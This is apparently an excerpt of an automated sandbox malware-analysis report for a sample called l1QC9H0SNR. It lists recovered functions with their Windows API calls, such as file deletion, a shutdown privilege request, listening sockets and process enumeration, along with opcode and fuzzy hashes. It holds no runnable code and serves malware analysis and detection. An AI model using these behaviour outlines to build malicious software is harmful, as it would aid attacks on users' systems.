                                              • Opcode ID: 9cb10c453b93d60f85c939344dec9c44de00bde786c135aa0a86a61646b3bc4b
                                              • Instruction ID: 3721af3fac14309b46839b6c91a9b704ef0eef80e718fb9bb4ebb757aedede5b
                                              • Opcode Fuzzy Hash: 9cb10c453b93d60f85c939344dec9c44de00bde786c135aa0a86a61646b3bc4b
                                              • Instruction Fuzzy Hash: 0AB16A75600216EBDF14CF68C9D57ADBBF1FF04701F0880AAEC899B295E734A950CB90
                                              Function 00B65760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: c992042c6075735170802f0c0b0665100bd4c0e0efc6d494be00fe29dea6d0b4
                                              • Instruction ID: 7e8cfcc25bf7b14118c29c2f057160f94d2a41a0679701a500d877631038095e
                                              • Opcode Fuzzy Hash: c992042c6075735170802f0c0b0665100bd4c0e0efc6d494be00fe29dea6d0b4
                                              • Instruction Fuzzy Hash: 75128A70A04609DFDF14DFA5D981AAEB7F5FF48300F1085A9E806A7291EB39AD24CB50
                                              Function 00BB3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BB3B89
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BB3BD9
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB3BEA
                                              • FindClose.KERNEL32(00000000), ref: 00BB3C01
                                              • FindClose.KERNEL32(00000000), ref: 00BB3C0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: 0fa1309a7a14d8a6fd8d4d1fd807326bb4be4ebb6df74fffd497a7275de4b0be
                                              • Instruction ID: 1fa729681ff33cb531da707f29e828240684d264959c0e2476244a0a3ffa2f4c
                                              • Opcode Fuzzy Hash: 0fa1309a7a14d8a6fd8d4d1fd807326bb4be4ebb6df74fffd497a7275de4b0be
                                              • Instruction Fuzzy Hash: A2317E310493859FC201EB64D8A19FFBBE8AE91315F404EADF8D5931A1EF219A0DC763
                                              Function 00BB51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00BB51F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                              • Instruction ID: 5e8e2cb78a9abf6a0d26c51efe020c5d271d9bd2741385e7479ee4e63180f73d
                                              • Opcode Fuzzy Hash: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                              • Instruction Fuzzy Hash: E401F731697A166FE7386668AC9BFFAB3D8DB05740F2404A1F943E20D2EAD11C0085A2
                                              Function 00BC6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BC62DC
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC62EB
                                              • bind.WS2_32(00000000,?,00000010), ref: 00BC6307
                                              • listen.WS2_32(00000000,00000005), ref: 00BC6316
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC6330
                                              • closesocket.WS2_32(00000000), ref: 00BC6344
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                              • Instruction ID: cd9eb14f05561dbbac1bdf68547023fbed6bc53886879386fbc3858c1662b4b3
                                              • Opcode Fuzzy Hash: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                              • Instruction Fuzzy Hash: 78219E756002059FCB10EF68C885F7EB7E9EF89721F1481A9E816A72D1DB70AD05CB51
                                              Function 00B65520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • _memmove.LIBCMT ref: 00BA0258
                                              • _memmove.LIBCMT ref: 00BA036D
                                              • _memmove.LIBCMT ref: 00BA0414
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 347cbc563faa6f3a392cbfdac8ea53850e0a6220e573557037d094f9439579b8
                                              • Instruction ID: 8cf37b27674f3578ca0768e48c20b5b96a662a3f9aa7198e547ab7b9d896aee8
                                              • Opcode Fuzzy Hash: 347cbc563faa6f3a392cbfdac8ea53850e0a6220e573557037d094f9439579b8
                                              • Instruction Fuzzy Hash: AE02C0B0A14209DBCF14EF64D981AAE7BF5EF49300F5480E9E80AEB251EB35DD54CB91
                                              Function 00B51287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00B519FA
                                              • GetSysColor.USER32(0000000F), ref: 00B51A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 00B51A61
                                                • Part of subcall function 00B51290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00B512D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ColorDialogNtdllProc_$LongWindow
                                              • String ID:
                                              • API String ID: 591255283-0
                                              • Opcode ID: b9055c05166d6134fa5a5984209f1e3b42b429913d59fc2ba1f7bff097fb176b
                                              • Instruction ID: a8dbffa92dc4e20053c4bf2f93b435cb6efddee5e006149c2e21d51a0fa49199
                                              • Opcode Fuzzy Hash: b9055c05166d6134fa5a5984209f1e3b42b429913d59fc2ba1f7bff097fb176b
                                              • Instruction Fuzzy Hash: B2A15A75106585BAEA2AAB3C8C94FBF25DCDB42343B1409DAFD12D21E2DA249D09D3B1
                                              Function 00BBBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBBCE6
                                              • _wcscmp.LIBCMT ref: 00BBBD16
                                              • _wcscmp.LIBCMT ref: 00BBBD2B
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00BBBD3C
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BBBD6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: 3cba8e21fe3fb310a948c5fd9b276975633564cd4d1a37726d00f53a3a75ce4f
                                              • Instruction ID: 29fd0b929763af90461c4086537925d2bd0f1c4e3f50598b3c7a7c9eb7c22650
                                              • Opcode Fuzzy Hash: 3cba8e21fe3fb310a948c5fd9b276975633564cd4d1a37726d00f53a3a75ce4f
                                              • Instruction Fuzzy Hash: 22516E356046029FC714DF68D491EAAB3E4EF49320F1446AEF966873A1DBB4ED04CB91
                                              Function 00BC6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BC7D8B: inet_addr.WS2_32(00000000), ref: 00BC7DB6
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00BC679E
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC67C7
                                              • bind.WS2_32(00000000,?,00000010), ref: 00BC6800
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC680D
                                              • closesocket.WS2_32(00000000), ref: 00BC6821
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                              • Instruction ID: a224b9ecef3d0374be4b2c3a4b5abf5c287ad34550c02198098cd513e0ef4f91
                                              • Opcode Fuzzy Hash: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                              • Instruction Fuzzy Hash: 5D419D75A00210AFEB10BF248C86F6E77E89B45755F0484EDFD1AAB2D2DA709D048B91
                                              Function 00BD5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                              • Instruction ID: 6ff9671fe07c395d85a2638f7208fa9c9b8dd593bc5a55e2524b0e29aee8282e
                                              • Opcode Fuzzy Hash: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                              • Instruction Fuzzy Hash: B911D0317019116BEB306F269C44B6AFBD8EF443A1B0040AAE847D7341EB70DD018AA8
                                              Function 00BA80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00BA80E0
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                              • Instruction ID: 6e240d5f171be7ceaf8789f93b3591090b795dd8bc73ecac4ea9c0e2fc98d23f
                                              • Opcode Fuzzy Hash: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                              • Instruction Fuzzy Hash: 37F0C230209206BFEB100FA4EC8DE777BBCEF4A754B000026F906D3150DF609D01DA60
                                              Function 00B63030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf
                                              • String ID:
                                              • API String ID: 674341424-0
                                              • Opcode ID: 18f3c238f79b49804593693513fb0f512ec8382d50d19a50edaed87bb49c54ff
                                              • Instruction ID: 72cd3a0a32067020924cb736e64493ab0f8e7dee43ddb8492cbe5d13b4d82133
                                              • Opcode Fuzzy Hash: 18f3c238f79b49804593693513fb0f512ec8382d50d19a50edaed87bb49c54ff
                                              • Instruction Fuzzy Hash: E02289716083019FCB24DF24C891B6EB7E4EF85710F1449ADF89A97391DB75EA08CB92
                                              Function 00BCEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00BCEE3D
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00BCEE4B
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00BCEF0B
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BCEF1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 1504575f3241c3fc73035573bf9223a4d581d25dec0924897bbc267618c0edc1
                                              • Instruction ID: 229eeb0aceca8f13619c60a27eb6843187a9b7ef92bc2644c9df850f144654d6
                                              • Opcode Fuzzy Hash: 1504575f3241c3fc73035573bf9223a4d581d25dec0924897bbc267618c0edc1
                                              • Instruction Fuzzy Hash: CD515A71508311ABD320EF24DC85F6BB7E8EF94750F1048ADF995972A1EB70E908CB92
                                              Function 00BDC498 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetCursorPos.USER32(?), ref: 00BDC4D2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B8B9AB,?,?,?,?,?), ref: 00BDC4E7
                                              • GetCursorPos.USER32(?), ref: 00BDC534
                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B8B9AB,?,?,?), ref: 00BDC56E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                              • String ID:
                                              • API String ID: 1423138444-0
                                              • Opcode ID: 8c90d1c85285b6c846ff5108c216ae2195b3c097418f5d1491061d962f22566d
                                              • Instruction ID: 7fbc241000135038ad5f8dc724c1522b03951703d867499f51a2364b6a4b0498
                                              • Opcode Fuzzy Hash: 8c90d1c85285b6c846ff5108c216ae2195b3c097418f5d1491061d962f22566d
                                              • Instruction Fuzzy Hash: E731A035600018EFCB158F98D899EEEBFF5EB4A314F0440A6F9058B3A1DB31AD50DBA4
                                              Function 00B51290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00B512D8
                                              • GetClientRect.USER32(?,?), ref: 00B8B5FB
